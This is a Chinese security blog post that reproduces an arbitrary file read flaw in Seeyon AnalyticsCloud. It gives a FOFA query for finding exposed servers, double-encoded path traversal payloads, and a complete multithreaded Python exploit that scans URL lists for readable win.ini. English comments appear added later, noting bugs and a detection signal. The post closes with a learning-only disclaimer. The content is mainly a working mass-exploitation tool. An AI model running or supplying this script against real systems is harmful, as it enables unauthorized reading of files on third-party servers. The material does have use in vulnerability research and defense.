致遠AnalyticsCloud分析雲任意檔案讀取漏洞復現

Fengzun發表於2024-07-28

產品介面圖:

FOFA:"AnalyticsCloud分析雲"

GET請求payload即可讀取檔案內容

payload:
/.%252e/.%252e/c:/windows/win.ini

/a/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/c:/windows/win.ini

EXP:

import requests
import argparse
import urllib3
import warnings
import threading
import time


# Silence urllib3's warnings (the original comment refers to the remote
# host actively closing the connection).
requests.packages.urllib3.disable_warnings()

# Suppress the InsecureRequestWarning that verify=False triggers on every request.
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)

# Static, browser-like headers sent with every probe. The User-Agent string is
# a fixed constant across runs, which gives a WAF or log rule something
# concrete to match on.
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0',
    'Cache-Control': 'max-age=0',
    'Sec-Ch-Ua': '"Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
}


# Path-traversal probe. Each ".%252e" is a double-URL-encoded ".." ("%25" decodes
# to "%", then "%2e" to "."), so a server that URL-decodes twice before
# normalising the path walks up the directory tree. The target is the
# Windows-only file c:/windows/win.ini; its "[fonts]" section is the success
# marker checked below. Defensive note: "%252e" (double-encoded dot) segments in
# request paths are a reliable detection signal and should be rejected/logged
# at the WAF or reverse proxy.
payload = "/a/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/c:/windows/win.ini"

def ACloud(url):
    """Probe one base URL (the -u mode) and print a green "[+]" line on a hit.

    Args:
        url: Base URL of the target; a trailing "/" is stripped before the
            module-level ``payload`` is appended.

    The host is reported as vulnerable only when the response body contains
    the ``[fonts]`` section of win.ini. Every exception (connection error,
    the 1 s timeout, ...) is caught and printed as "not vulnerable or request
    failed", so a slow host is indistinguishable from a patched one.
    """
    url = url.rstrip("/")
    AC_url = url + payload
    try:
        # verify=False disables TLS certificate validation; timeout=1 bounds each probe.
        AC_re = requests.get(AC_url, headers=headers, verify=False, timeout=1)
        if "[fonts]" in AC_re.text:
            print("\033[32m[+]" + "漏洞存在,請訪問" + AC_url + "\033[0m")
    except Exception as e:
        # Broad catch: network errors and timeouts all land here; ``e`` is never used.
        print("漏洞不存在或請求失敗")

def ACloud_Scan_file(url):
    """Thread worker for the -f (file) mode: probe one URL and print it at most once on a hit.

    Args:
        url: Base URL read from the input file; a trailing "/" is stripped.

    Relies on the module-level set ``ACloud_Scan_urls`` (created in the
    ``__main__`` block) to avoid printing the same target twice.

    NOTE(review): ``result`` is assigned only when ``[fonts]`` is found, so on
    a non-vulnerable host the ``if result not in ...`` line raises
    UnboundLocalError; the broad ``except`` below swallows it and prints the
    red "[-]" line. The output is right, but by accident, and the same
    ``except`` also hides timeouts and connection errors.
    """
    url = url.rstrip("/")
    ACfile_url = url + payload
    try:
        ACfile_re = requests.get(ACfile_url, headers=headers, verify=False, timeout=1)
        if "[fonts]" in ACfile_re.text:
            result = "\033[32m[+]" + ACfile_url + "\033[0m"

        # Avoid printing the same target more than once. The set is shared by
        # all worker threads without a lock; the check-then-add is not atomic.
        if result not in ACloud_Scan_urls:
            ACloud_Scan_urls.add(result)
            print(result)

    except Exception as e:
        print("\033[31m[-]" + url + "\033[0m")


if __name__ == '__main__':
    # CLI entry point: -u probes a single URL, -f probes every non-empty line
    # of a file with one thread per URL (no concurrency cap).
    parser = argparse.ArgumentParser(description="2024.07.06")
    # NOTE: .strip() on the string literals '--url' / '--file' is a no-op.
    parser.add_argument('-u', '--url'.strip(), help='eg: -u http://www.xx.com')
    parser.add_argument('-f', '--file'.strip(), help='eg: -f urls.txt')
    args = parser.parse_args()

    if (args.url):
        ACloud(args.url)

    elif (args.file):
        with open(args.file,'r') as f:
            ACloud_urls = [line.strip() for line in f if line.strip()]
            # Module-level set read and written by the ACloud_Scan_file threads.
            ACloud_Scan_urls = set()
        threads = []

        for AC_url in ACloud_urls:
            thread = threading.Thread(target=ACloud_Scan_file, args=(AC_url,))
            thread.start()
            threads.append(thread)

        # Wait for every worker before the interpreter exits.
        for thread in threads:
            thread.join()

    else:
            print(parser.format_help())

宣告:漏洞利用指令碼僅供學習參考,請遵守相關法律法規,切勿非法滲透,後果自負。
